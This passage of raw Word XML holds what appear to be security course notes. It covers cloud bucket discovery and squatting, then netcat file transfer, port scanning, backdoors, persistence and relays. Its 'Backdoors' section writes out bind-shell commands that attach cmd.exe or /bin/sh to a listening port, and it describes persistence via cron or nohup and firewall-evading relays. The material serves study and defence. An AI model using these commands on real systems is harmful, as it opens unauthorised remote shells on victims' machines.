              </w:rPr>
              <w:t>Bucket discovery is about creativity in selecting names.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5940AF1D" w14:textId="77777777" w:rsidR="00BA3BB4" w:rsidRDefault="00BA3BB4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Using the default wordlist for buckets is OK, but others have likely already scanned those names.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10C97F81" w14:textId="77777777" w:rsidR="00BA3BB4" w:rsidRDefault="00BA3BB4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Apply creativity and thing how administrations might name buckets.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="002810CF" w14:textId="12AC4E0C" w:rsidR="00BA3BB4" w:rsidRPr="00BA3BB4" w:rsidRDefault="00BA3BB4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Think about scanning the name Falsimentis corporation.</w:t>
            </w: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5C2956D8" w14:textId="69B16CF1" w:rsidR="00303D06" w:rsidRDefault="003867D2">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Use the same attack took to identify vulnerabilities that could expose your organization.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F7E312F" w14:textId="65B06928" w:rsidR="003867D2" w:rsidRDefault="003867D2">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>There is not identify verification for bucket names, so others may create buckets purporting to be your company name.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="340D00E4" w14:textId="4D9F035A" w:rsidR="003867D2" w:rsidRDefault="003867D2">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>So-called bucket squatting can be used for phishing attacks.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="164CC7F6" w14:textId="2C9E7546" w:rsidR="003867D2" w:rsidRDefault="003867D2">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Attributing bucket ownership can be difficult – whose files are these?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62ECABE3" w14:textId="7BDEAAD7" w:rsidR="003867D2" w:rsidRPr="003867D2" w:rsidRDefault="003867D2">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Assessing risk of open buckets can also be difficult – is there sensitive information disclosure in any of these 100k files?</w:t>
            </w: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5E1DF179" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="0077565B" w:rsidRDefault="003867D2">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="80"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0077565B">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>DNS, HTTP proxy, and network logs are a valuable tool for identifying cloud storage use in your organization.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54E8261C" w14:textId="256B9CB1" w:rsidR="003867D2" w:rsidRPr="0077565B" w:rsidRDefault="003867D2">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="80"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0077565B">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Dns names: </w:t>
            </w:r>
            <w:r w:rsidR="0077565B" w:rsidRPr="0077565B">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>identifies</w:t>
            </w:r>
            <w:r w:rsidRPr="0077565B">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Azure blob use, </w:t>
            </w:r>
            <w:r w:rsidR="0077565B">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>some</w:t>
            </w:r>
            <w:r w:rsidRPr="0077565B">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> S3 </w:t>
            </w:r>
            <w:r w:rsidR="0077565B" w:rsidRPr="0077565B">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>buckets (bucket.s3amazonaws.com but not s3.amazonaws.com/bucket)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="647CF632" w14:textId="7DBE8BE3" w:rsidR="0077565B" w:rsidRDefault="0077565B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>HTTP proxy logs: Identifies all cloud storage providers.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4831F38F" w14:textId="7E3FBF51" w:rsidR="0077565B" w:rsidRPr="0077565B" w:rsidRDefault="0077565B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Network logs: SNI disclosure.</w:t>
            </w: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09D48D42" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="0077565B" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Configure all cloud storage to log access request. This is not turned on by default, and few organizations have any insight into who access cloud storage repositories.</w:t>
            </w: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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="328FC17D" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="002C43F0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Simply reads and writes data across network.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EEEA216"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Focus on moving raw data between pots on systems.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="463AC591"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There are many daces of netcat (different versions):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DA12355"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Traditional Netcat, written fo UNIX in 1996.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DAADB2E"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Rewritten for Win32 in 1998</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B85B743"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GNU Netcat, function equivalent</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A9286AD" w14:textId="16FDC105" w:rsidR="002C43F0" w:rsidRP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NCAT, a variation created for the Nmap project</w:t>
            </w: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Client Mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53B1E8CD" w14:textId="23E512F7"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Client mode starts a connection to a specific port.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FEE84F9" w14:textId="5FFC87B3"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Standard input is sent across network, keyboard, redirected from a file or piped from an application.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05783408" w14:textId="00F0952C"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All data back from the network is put on standard output.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28977A06" w14:textId="4DE5DBC7" w:rsidR="002C43F0" w:rsidRP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Messages from the tool itself are sent to the standard error. This is nice because they won’t be put in stdout and won’t corrupt anything you want to capture.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="380B35F3" w14:textId="1FE29D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Listen Mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B6DF574"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Listen mode waits for connection on a specific port.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="629275E5"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lastRenderedPageBreak/>
              <w:t>All data received from the network is put on standard output. Screen, redirected to a file or sent to an application.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CF57745" w14:textId="338A2EDE" w:rsidR="002C43F0" w:rsidRDefault="002C43F0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Standard input is sent across network.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07AE0871" w14:textId="115EBC1A" w:rsidR="002C43F0" w:rsidRDefault="002C43F0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Messages from the tool itself are sent to standard error (stderr)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3593805A" w14:textId="3A34ABD1" w:rsidR="002C43F0" w:rsidRPr="002C43F0" w:rsidRDefault="002C43F0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Mirror image of the previous page’s picture; the only difference is clients start connections, or listeners wait for them to arrive.</w:t>
            </w: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Some Netcat Uses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5758C91C" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="002C43F0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Data transfer</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15DBEC59"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Port scanning</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10E9E1B2"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Making connections to open ports</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="151B0069"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Backdoors.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27BAD4CF" w14:textId="44543432" w:rsidR="002C43F0" w:rsidRPr="002C43F0" w:rsidRDefault="002C43F0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Relays</w:t>
            </w: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Data Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56B9ABB1" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="002C43F0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C43F0">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Send files between systems</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0836865D" w14:textId="77777777" w:rsidR="002C43F0" w:rsidRDefault="00B35841">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Option 1) to mode a file from listener back to client:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28E9E967"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Listener: nc -l -p port &lt; filename</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="358FB0DD"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Client: nc listenerIP port &gt; filename</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6169C9F5"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Option 2) To push a file from client to listener</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C194281"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Listener: nc -l -p port &gt; filename</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="116390D4"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Client: nc listenerIP port &lt; filename</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31104728" w14:textId="3B289737" w:rsidR="00B35841" w:rsidRDefault="00B35841">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>You can even use some browsers as the client for option 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="116E8DC4"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Works with TCP or UDP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ACC2D41" w14:textId="412CAB73" w:rsidR="00B35841" w:rsidRPr="00B35841" w:rsidRDefault="00B35841">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>You can even set up source IP address on listener so that it only accepts connections from one source address.</w:t>
            </w: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Port Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28506049" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="00B35841">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>TCP and UDP port scanning</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42E90972"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Linear scans (default) or random scans (with the -r option)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05E582B2"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-z option for minimal data to be sent.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E9F71BE"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-v tell us when a connection is made (crucial info for a port scanner)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E03D93C"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-w3 means wait no more than 3 seconds on each port.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1935D5C6"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Can scan from any source port and source routing supported.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DB0EA32" w14:textId="396D4CD9" w:rsidR="00B35841" w:rsidRPr="00B35841" w:rsidRDefault="00B35841">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>We can go further, connecting to various ports, entering data, and recording the response.</w:t>
            </w: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Backdoors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08A76E04" w14:textId="77777777" w:rsidR="00B35841" w:rsidRDefault="00B35841" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>The attacker must be able to run Netcat on the victim to create a shell listener.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20D113B5" w14:textId="77777777" w:rsidR="00B35841" w:rsidRDefault="00B35841" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Windows: nc -l -p port -e cmd.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E722DC2" w14:textId="22F1988E" w:rsidR="00B35841" w:rsidRPr="006F5A04" w:rsidRDefault="00B35841" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Linux: nc -l -p port -e /bin/sh</w:t>
            </w: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Persistent Backdoor Listeners</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A1611C0"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With the -l flag, Netcat listens once.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6551FF3E"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When a connection is dropped, Netcat stops listening.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="421DE362"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On windows, Netcat restarts listening when invoked with -L</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="118BA607" w14:textId="1675C21F" w:rsidR="00E1037D" w:rsidRPr="00E1037D" w:rsidRDefault="00E1037D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">On Linux/UNIX, Netcat can be made persistent in several ways, like schedule a cron job to start Netcat regularly, use a version of Netcat that support -L, use a while look in a script launched with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">nohup </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>(ignores logout signal).</w:t>
            </w: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Relays</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55685E4E"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Use Netcat to relay information from system to system to system.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B1E35D6"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bypass a firewall control by redirecting through a host.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B1BF6B2"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Make it harder to trace the origin of an attack.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A0736ED" w14:textId="3D86EFDC" w:rsidR="00E1037D" w:rsidRPr="00E1037D" w:rsidRDefault="00E1037D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
